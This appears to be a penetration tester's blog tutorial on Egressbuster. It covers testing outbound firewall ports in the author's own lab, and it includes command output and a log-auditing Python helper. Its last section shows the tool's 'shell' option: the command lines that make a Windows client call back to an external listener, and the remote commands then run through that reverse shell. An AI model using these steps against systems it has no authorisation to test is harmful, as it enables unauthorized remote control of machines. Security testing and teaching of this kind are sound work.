Using Egressbuster to Test Outbound Firewall Rules

While I’ve used it for a while now, I wanted to share a quick write-up about Egressbuster.

Egressbuster – Introduction

Egressbuster (GitHub repository) is a tool by TrustedSec that they designed to test outgoing ports during a penetration test.

Configuring the Firewall

First, I configured my firewall to block all outgoing ports except for 22, 80, 443, and 31337-31339. This would allow me to verify that the application was working.

Egressbuster - Firewall rules

Additionally, it mirrors a real environment that might only allow HTTP(s) traffic and then something obscure outbound.

Starting the Server

With my firewall rules in place, I started the server up on a DO droplet.

root@ubuntu-512mb-sfo2-01:~# ifconfig eth0 | grep Mask
          inet addr:138.xx.xx.xx  Bcast:138.xx.xx.255  Mask:255.255.xx.xx

root@ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.

Running the Client

With the server running, it was time to test the rules.

While I used the egressbuster.py script, the results will be the same with the executable as well.

Also, based on my “very official” timing method, it takes about 12 minutes to test every port over my connection.

C:\Users\Ray\Documents>time
The current time is: 15:57:43.78
Enter the new time:
C:\Users\Ray\Documents>python egressbuster.py 138.xx.xx.xx 1-65535
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 65535/tcp
[*] Connection made to 138.xx.xx.xx on port: 22/tcp
[*] Connection made to 138.xx.xx.xx on port: 80/tcp
[*] Connection made to 138.xx.xx.xx on port: 443/tcp
[v] Trying: TCP 1000
[v] Trying: TCP 2000

... <snip> ...

[v] Trying: TCP 31000
[*] Connection made to 138.xx.xx.xx on port: 31337/tcp
[*] Connection made to 138.xx.xx.xx on port: 31338/tcp
[*] Connection made to 138.xx.xx.xx on port: 31339/tcp
[v] Trying: TCP 32000
[v] Trying: TCP 33000

... <snip> ...

[v] Trying: TCP 65000
[*] All packets have been sent
[i] Remaining threads: 301
[i] Remaining threads: 102
[i] Remaining threads: 3

... <snip> ...

[i] Remaining threads: 3
Traceback (most recent call last):
  File "egressbuster.py", line 168, in <module>
    time.sleep(2)
KeyboardInterrupt

C:\Users\Ray\Documents>time
The current time is: 16:09:49.56
Enter the new time:

I’m not sure why three threads didn’t want to complete, but the results were still completely accurate.

Server Results

Going back to the server, I was able to see the successful connections as well.

root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
[*] Connected from 172.xx.xx.xx on port: 80/tcp
[*] Connected from 172.xx.xx.xx on port: 443/tcp
[*] Connected from 172.xx.xx.xx on port: 31338/tcp
[*] Connected from 172.xx.xx.xx on port: 31337/tcp
[*] Connected from 172.xx.xx.xx on port: 31339/tcp
^C
[*] Exiting and removing iptables redirect rule.
[*] Done
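
The two transcripts above can be checked against the intended rule set (22, 80, 443, 31337-31339) instead of being compared by eye. The following is an added example, not part of Egressbuster or the original post: `expand_ports` and `audit` are hypothetical helper names, and the sample logs are constructed to follow the line formats shown above.

```python
import re

# Line formats as they appear in the client and listener transcripts above.
CLIENT_RE = re.compile(r"^\[\*\] Connection made to \S+ on port: (\d+)/tcp", re.M)
SERVER_RE = re.compile(r"^\[\*\] Connected from \S+ on port: (\d+)/tcp", re.M)

def expand_ports(spec):
    """Expand a spec such as '22,80,443,31337-31339' into a set of ints."""
    ports = set()
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        ports.update(range(int(lo), int(hi or lo) + 1))
    return ports

def audit(allowed_spec, client_log, server_log):
    """Compare observed egress with the intended allow-list (hypothetical helper)."""
    allowed = expand_ports(allowed_spec)
    client = {int(p) for p in CLIENT_RE.findall(client_log)}
    server = {int(p) for p in SERVER_RE.findall(server_log)}
    return {
        "unexpected_open": sorted(client - allowed),      # egress the rules should have blocked
        "allowed_not_reached": sorted(allowed - client),  # allowed, but no connection observed
        "client_only": sorted(client - server),           # client connected, listener logged nothing
        "server_only": sorted(server - client),           # listener logged it, client did not report it
    }

ALLOWED = "22,80,443,31337-31339"  # the rule set configured in this post

# Constructed sample logs (documentation IPs). 8080 is an invented leak, 80 is
# deliberately absent, and 31339 is missing from the listener side.
CLIENT_LOG = """\
[*] Connection made to 203.0.113.10 on port: 22/tcp
[*] Connection made to 203.0.113.10 on port: 443/tcp
[v] Trying: TCP 1000
[*] Connection made to 203.0.113.10 on port: 8080/tcp
[*] Connection made to 203.0.113.10 on port: 31337/tcp
[*] Connection made to 203.0.113.10 on port: 31338/tcp
[*] Connection made to 203.0.113.10 on port: 31339/tcp
"""
SERVER_LOG = """\
[*] Connected from 198.51.100.7 on port: 22/tcp
[*] Connected from 198.51.100.7 on port: 443/tcp
[*] Connected from 198.51.100.7 on port: 8080/tcp
[*] Connected from 198.51.100.7 on port: 31338/tcp
[*] Connected from 198.51.100.7 on port: 31337/tcp
"""

if __name__ == "__main__":
    print(audit(ALLOWED, CLIENT_LOG, SERVER_LOG))
```

A port that lands in `client_only` deserves a second look before it goes into a report, since the client's view alone does not show that the connection reached the external listener.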

Shell Parameter

Finally, I want to give a quick demonstration of the shell parameter. This parameter creates a reverse shell that allows you to send commands to the “target” system. Author’s note: This reverse shell goes from your listening server to the internal server, so you will need to either have an external IP address or NAT configured.

First, I set up NAT rules on my pfSense box so that I could receive the commands.

Egressbuster - NAT Everything

Next, I started the server back up with the shell parameter.

root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.

Finally, I ran the script to test outgoing connections again. Note that I only used ports 1-50 for this test since I already knew what would work.

C:\Users\Ray\Documents>python egressbuster.py 138.xx.xx.xx 1-50 shell
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 50/tcp
[*] Connection made to 138.xx.xx.xx on port: 22/tcp
[*] All packets have been sent
[i] Remaining threads: 50
[i] Remaining threads: 50
[i] Remaining threads: 1
[i] Remaining threads: 1
[*] Done

On the listener side, I was able to send commands to the client. This was occasionally flaky, and would drop or send the wrong command. I would probably use this for short bursts/1 or 2 commands before migrating to something more stable.

root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
Enter the command to send to the victim:
Enter the command to send to the victim: whoami
megatron\ray
Enter the command to send to the victim: ipconfig
Windows IP Configuration


Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : xxx
   IPv4 Address. . . . . . . . . . . : 192.168.5.xx
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.5.1

Tunnel adapter isatap.
Enter the command to send to the victim: dir
----------------------------------------
Exception happened during processing of request from ('172.xx.xx.xx', 59070)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "egress_listener.py", line 63, in handle
    self.request.sendall(request)
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
error: [Errno 32] Broken pipe
----------------------------------------

dir
^C
[*] Exiting and removing iptables redirect rule.
[*] Done

Egressbuster – Conclusion

This is a great tool for testing outgoing ports on a network, and I find myself using it from time to time.

Additionally, having the executable makes life easier for Windows machines without Python.

Note that a few vendors flag the executable, so be aware of that during your testing.

Egressbuster - VirusTotal

doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCP, eCPPT, eWPT, eWPTX, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next (currently GXPN) or side project to work on, he enjoys playing video games, traveling, and watching sports.